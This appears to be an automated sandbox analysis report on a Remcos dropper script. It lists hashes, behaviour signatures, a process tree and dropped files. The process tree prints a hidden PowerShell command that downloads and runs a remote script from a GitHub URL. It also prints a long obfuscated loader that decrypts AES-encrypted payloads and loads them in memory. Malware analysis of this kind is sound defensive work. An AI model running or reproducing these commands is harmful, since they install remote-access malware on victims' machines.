Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 22:47

General

  • Target

    ETL3M_remcos.vbs

  • Size

    563KB

  • MD5

    f7c17bfb4247e64e22dd52540a4b903b

  • SHA1

    368ba4d02df294fa42efee5e4f330d5e7260d0c3

  • SHA256

    23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622

  • SHA512

    5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4

  • SSDEEP

    12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ETL3M_remcos.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2188
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
          4⤵
            PID:2892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2964

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\n1.bat

      Filesize

      562KB

      MD5

      d1d99208a499e870e1e0a34a2cbba829

      SHA1

      85f7090ce76bdae0a07154b27117ec5ac9e9f673

      SHA256

      d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879

      SHA512

      badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LSBTZU62H2JS0QL4K0Y9.temp

      Filesize

      7KB

      MD5

      5017493d4117071e40b0ebdcfc586969

      SHA1

      e239bbfdcda139cb1eedcbe2b71f791312614c72

      SHA256

      360c61699a4cda2c942a7b972208cb1c319e173718db5da976c82764c6b5b2d1

      SHA512

      bde52cef83a8fb040038f8f1f8d648113683fd2ea3464cdf074bcce8ab078454d502bb1e07d69feeb52cbfabf2cfed4924182a3c6767cc7a861918faaec6903f

    • memory/2188-4-0x000007FEF666E000-0x000007FEF666F000-memory.dmp

      Filesize

      4KB

    • memory/2188-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2188-6-0x00000000020F0000-0x00000000020F8000-memory.dmp

      Filesize

      32KB

    • memory/2188-7-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2188-8-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2188-9-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2188-10-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2188-11-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2188-12-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

      Filesize

      9.6MB